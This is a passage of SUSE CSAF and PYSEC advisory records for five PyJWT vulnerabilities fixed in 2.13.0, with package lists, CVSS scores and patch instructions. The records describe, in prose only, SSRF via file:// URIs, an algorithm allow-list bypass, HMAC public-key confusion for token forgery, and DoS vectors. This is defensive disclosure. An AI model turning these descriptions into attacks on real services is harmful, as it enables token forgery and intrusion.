"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-13T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-48525"
},
{
"cve": "CVE-2026-48526",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-48526"
}
],
"notes": [
{
"category": "general",
"text": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, when a verifier that supports both asymmetric and HMAC algorithms decodes JSON Web Tokens, the library does not validate the use of JSON Web Keys with HMAC algorithms, allowing an attacker to use the issuer\u0027s public key as the secret key for an HMAC algorithm. This vulnerability is fixed in 2.13.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-48526",
"url": "https://www.suse.com/security/cve/CVE-2026-48526"
},
{
"category": "external",
"summary": "SUSE Bug 1266802 for CVE-2026-48526",
"url": "https://bugzilla.suse.com/1266802"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.4,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-13T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-48526"
}
]
}
PYSEC-2026-175
Vulnerability from pysec - Published: 2026-05-28 16:16 - Updated: 2026-06-02 10:34
PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient passes its uri argument directly to urllib.request.urlopen() which uses Python stdlib's default OpenerDirector registering HTTPHandler, HTTPSHandler, FTPHandler, FileHandler, and DataHandler. There is currently no documented option to restrict which schemes PyJWKClient will fetch. If an application's jku URL ingestion path accepts attacker-influenced URLs (e.g., from JWT header, configuration file, OAuth flow parameter), the attacker can cause PyJWKClient to read arbitrary local files via file:// (SSRF on local filesystem), cause PyJWKClient to attempt FTP / data-URI fetches (broader SSRF surface), or forge tokens that PyJWT verifies as valid. The library does not directly return non-HTTP(S) URI contents to the attacker; the chained "plant a JWKS to forge tokens" scenario described in the original report requires additional application-layer flaws (attacker write access to a filesystem path, untrusted jku derivation) that this fix does not address. This vulnerability is fixed in 2.13.0.
| Name | purl |
|---|---|
| pyjwt | pkg:pypi/pyjwt |
{
"affected": [
{
"ecosystem_specific": {},
"package": {
"ecosystem": "PyPI",
"name": "pyjwt",
"purl": "pkg:pypi/pyjwt"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.13.0"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"0.1.1",
"0.1.2",
"0.1.3",
"0.1.4",
"0.1.5",
"0.1.6",
"0.1.7",
"0.1.8",
"0.1.9",
"0.2.0",
"0.2.1",
"0.2.3",
"0.3.0",
"0.3.1",
"0.3.2",
"0.4.0",
"0.4.1",
"0.4.2",
"0.4.3",
"1.0.0",
"1.0.1",
"1.1.0",
"1.3.0",
"1.4.0",
"1.4.1",
"1.4.2",
"1.5.0",
"1.5.1",
"1.5.2",
"1.5.3",
"1.6.0",
"1.6.1",
"1.6.3",
"1.6.4",
"1.7.0",
"1.7.1",
"2.0.0",
"2.0.0a1",
"2.0.0a2",
"2.0.1",
"2.1.0",
"2.10.0",
"2.10.1",
"2.11.0",
"2.12.0",
"2.12.1",
"2.2.0",
"2.3.0",
"2.4.0",
"2.5.0",
"2.6.0",
"2.7.0",
"2.8.0",
"2.9.0"
]
}
],
"aliases": [
"CVE-2026-48522",
"GHSA-993g-76c3-p5m4"
],
"details": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient passes its uri argument directly to urllib.request.urlopen() which uses Python stdlib\u0027s default OpenerDirector registering HTTPHandler, HTTPSHandler, FTPHandler, FileHandler, and DataHandler. There is currently no documented option to restrict which schemes PyJWKClient will fetch. If an application\u0027s jku URL ingestion path accepts attacker-influenced URLs (e.g., from JWT header, configuration file, OAuth flow parameter), the attacker can cause PyJWKClient to read arbitrary local files via file:// (SSRF on local filesystem), cause PyJWKClient to attempt FTP / data-URI fetches (broader SSRF surface), or forge tokens that PyJWT verifies as valid. The library does not directly return non-HTTP(S) URI contents to the attacker; the chained \"plant a JWKS to forge tokens\" scenario described in the original report requires additional application-layer flaws (attacker write access to a filesystem path, untrusted jku derivation) that this fix does not address. This vulnerability is fixed in 2.13.0.",
"id": "PYSEC-2026-175",
"modified": "2026-06-02T10:34:20.846008Z",
"published": "2026-05-28T16:16:29.150Z",
"references": [
{
"type": "EVIDENCE",
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4"
}
],
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
SUSE-SU-2026:22138-1
Vulnerability from csaf_suse - Published: 2026-06-16 09:09 - Updated: 2026-06-16 09:09
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for python-PyJWT",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for python-PyJWT fixes the following issues:\n\n- CVE-2026-48522: `PyJWKClient` passes URI arguments directly to `urllib.request.urlopen()` and allows for SSRF and\n token forgery (bsc#1266798).\n- CVE-2026-48523: verifier-side algorithm allow-list bypass when `jwt.decode()` or `jwt.decode_complete()` are called\n with a PyJWK key (bsc#1266799).\n- CVE-2026-48524: unlimited processing of JWTs with unknown kid values by `PyJWKClient.get_signing_key()` leads to\n unbounded JWKS endpoint requests and DoS (bsc#1266800).\n- CVE-2026-48525: unbounded Base64URL decoding of unused payload segment in `b64=false` detached JWS allows for DoS\n (bsc#1266801).\n- CVE-2026-48526: no validation of use of JSON Web Keys in HMAC algorithm when decoding JSON Web Tokens allows for\n forged HS256 tokens (bsc#1266802).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-SLE-Micro-6.1-580",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_22138-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:22138-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202622138-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:22138-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2026-June/047389.html"
},
{
"category": "self",
"summary": "SUSE Bug 1266798",
"url": "https://bugzilla.suse.com/1266798"
},
{
"category": "self",
"summary": "SUSE Bug 1266799",
"url": "https://bugzilla.suse.com/1266799"
},
{
"category": "self",
"summary": "SUSE Bug 1266800",
"url": "https://bugzilla.suse.com/1266800"
},
{
"category": "self",
"summary": "SUSE Bug 1266801",
"url": "https://bugzilla.suse.com/1266801"
},
{
"category": "self",
"summary": "SUSE Bug 1266802",
"url": "https://bugzilla.suse.com/1266802"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-48522 page",
"url": "https://www.suse.com/security/cve/CVE-2026-48522/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-48523 page",
"url": "https://www.suse.com/security/cve/CVE-2026-48523/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-48524 page",
"url": "https://www.suse.com/security/cve/CVE-2026-48524/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-48525 page",
"url": "https://www.suse.com/security/cve/CVE-2026-48525/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-48526 page",
"url": "https://www.suse.com/security/cve/CVE-2026-48526/"
}
],
"title": "Security update for python-PyJWT",
"tracking": {
"current_release_date": "2026-06-16T09:09:33Z",
"generator": {
"date": "2026-06-16T09:09:33Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:22138-1",
"initial_release_date": "2026-06-16T09:09:33Z",
"revision_history": [
{
"date": "2026-06-16T09:09:33Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch",
"product": {
"name": "python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch",
"product_id": "python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Micro 6.1",
"product": {
"name": "SUSE Linux Micro 6.1",
"product_id": "SUSE Linux Micro 6.1",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sl-micro:6.1"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch as component of SUSE Linux Micro 6.1",
"product_id": "SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
},
"product_reference": "python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch",
"relates_to_product_reference": "SUSE Linux Micro 6.1"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-48522",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-48522"
}
],
"notes": [
{
"category": "general",
"text": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient passes its uri argument directly to urllib.request.urlopen() which uses Python stdlib\u0027s default OpenerDirector registering HTTPHandler, HTTPSHandler, FTPHandler, FileHandler, and DataHandler. There is currently no documented option to restrict which schemes PyJWKClient will fetch. If an application\u0027s jku URL ingestion path accepts attacker-influenced URLs (e.g., from JWT header, configuration file, OAuth flow parameter), the attacker can cause PyJWKClient to read arbitrary local files via file:// (SSRF on local filesystem), cause PyJWKClient to attempt FTP / data-URI fetches (broader SSRF surface), or forge tokens that PyJWT verifies as valid. The library does not directly return non-HTTP(S) URI contents to the attacker; the chained \"plant a JWKS to forge tokens\" scenario described in the original report requires additional application-layer flaws (attacker write access to a filesystem path, untrusted jku derivation) that this fix does not address. This vulnerability is fixed in 2.13.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-48522",
"url": "https://www.suse.com/security/cve/CVE-2026-48522"
},
{
"category": "external",
"summary": "SUSE Bug 1266798 for CVE-2026-48522",
"url": "https://bugzilla.suse.com/1266798"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-16T09:09:33Z",
"details": "moderate"
}
],
"title": "CVE-2026-48522"
},
{
"cve": "CVE-2026-48523",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-48523"
}
],
"notes": [
{
"category": "general",
"text": "PyJWT is a JSON Web Token implementation in Python. From 2.9.0 to 2.12.1, there is a verifier-side algorithm allow-list bypass when jwt.decode() or jwt.decode_complete() are called with a PyJWK key. The token header alg is checked against the caller-supplied algorithms allow-list, but signature verification is performed with the algorithm bound to the PyJWK object instead of the header algorithm. An attacker who controls a registered JWK/JWKS private key can sign with a disallowed algorithm, advertise an allowed algorithm in the JWT header, and still be accepted. The issue affects the documented PyJWKClient.get_signing_key_from_jwt(...) flow. This vulnerability is fixed in 2.13.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-48523",
"url": "https://www.suse.com/security/cve/CVE-2026-48523"
},
{
"category": "external",
"summary": "SUSE Bug 1266799 for CVE-2026-48523",
"url": "https://bugzilla.suse.com/1266799"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-16T09:09:33Z",
"details": "moderate"
}
],
"title": "CVE-2026-48523"
},
{
"cve": "CVE-2026-48524",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-48524"
}
],
"notes": [
{
"category": "general",
"text": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient.get_signing_key() forces a fresh HTTP request to the JWKS endpoint for every JWT with an unknown kid value, with no rate limiting. Since kid comes from the unverified token header, an attacker can trigger unlimited outbound requests. The vulnerability surfaces only when a JWKS fetch fails; an attacker can attempt to provoke that with sustained unknown-kid traffic, but the outcome depends on upstream JWKS-endpoint behavior (rate limiting, transient errors) which is beyond the attacker\u0027s control. This vulnerability is fixed in 2.13.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-48524",
"url": "https://www.suse.com/security/cve/CVE-2026-48524"
},
{
"category": "external",
"summary": "SUSE Bug 1266800 for CVE-2026-48524",
"url": "https://bugzilla.suse.com/1266800"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.7,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-16T09:09:33Z",
"details": "low"
}
],
"title": "CVE-2026-48524"
},
{
"cve": "CVE-2026-48525",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-48525"
}
],
"notes": [
{
"category": "general",
"text": "PyJWT is a JSON Web Token implementation in Python. From 2.8.0 to 2.12.1, when verifying detached JWS tokens using the unencoded-payload option (\"b64\": false, RFC 7797), PyJWT performs Base64URL decoding of the compact-serialization payload segment before enforcing the detached-payload rules. For b64=false, PyJWT later discards that decoded payload and replaces it with the caller-provided detached_payload. In practice, this turns the middle segment into an attacker-controlled \u201cwork amplifier\u201d: a remote client can supply an arbitrarily large Base64URL payload segment that forces CPU work + memory allocations even if the signature is invalid. This creates an unauthenticated DoS vector against any endpoint that verifies detached JWS using PyJWT. This vulnerability is fixed in 2.13.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-48525",
"url": "https://www.suse.com/security/cve/CVE-2026-48525"
},
{
"category": "external",
"summary": "SUSE Bug 1266801 for CVE-2026-48525",
"url": "https://bugzilla.suse.com/1266801"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-16T09:09:33Z",
"details": "important"
}
],
"title": "CVE-2026-48525"
},
{
"cve": "CVE-2026-48526",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-48526"
}
],
"notes": [
{
"category": "general",
"text": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, when a verifier that supports both asymmetric and HMAC algorithms decodes JSON Web Tokens, the library does not validate the use of JSON Web Keys with HMAC algorithms, allowing an attacker to use the issuer\u0027s public key as the secret key for an HMAC algorithm. This vulnerability is fixed in 2.13.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-48526",
"url": "https://www.suse.com/security/cve/CVE-2026-48526"
},
{
"category": "external",
"summary": "SUSE Bug 1266802 for CVE-2026-48526",
"url": "https://bugzilla.suse.com/1266802"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.4,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-16T09:09:33Z",
"details": "important"
}
],
"title": "CVE-2026-48526"
}
]
}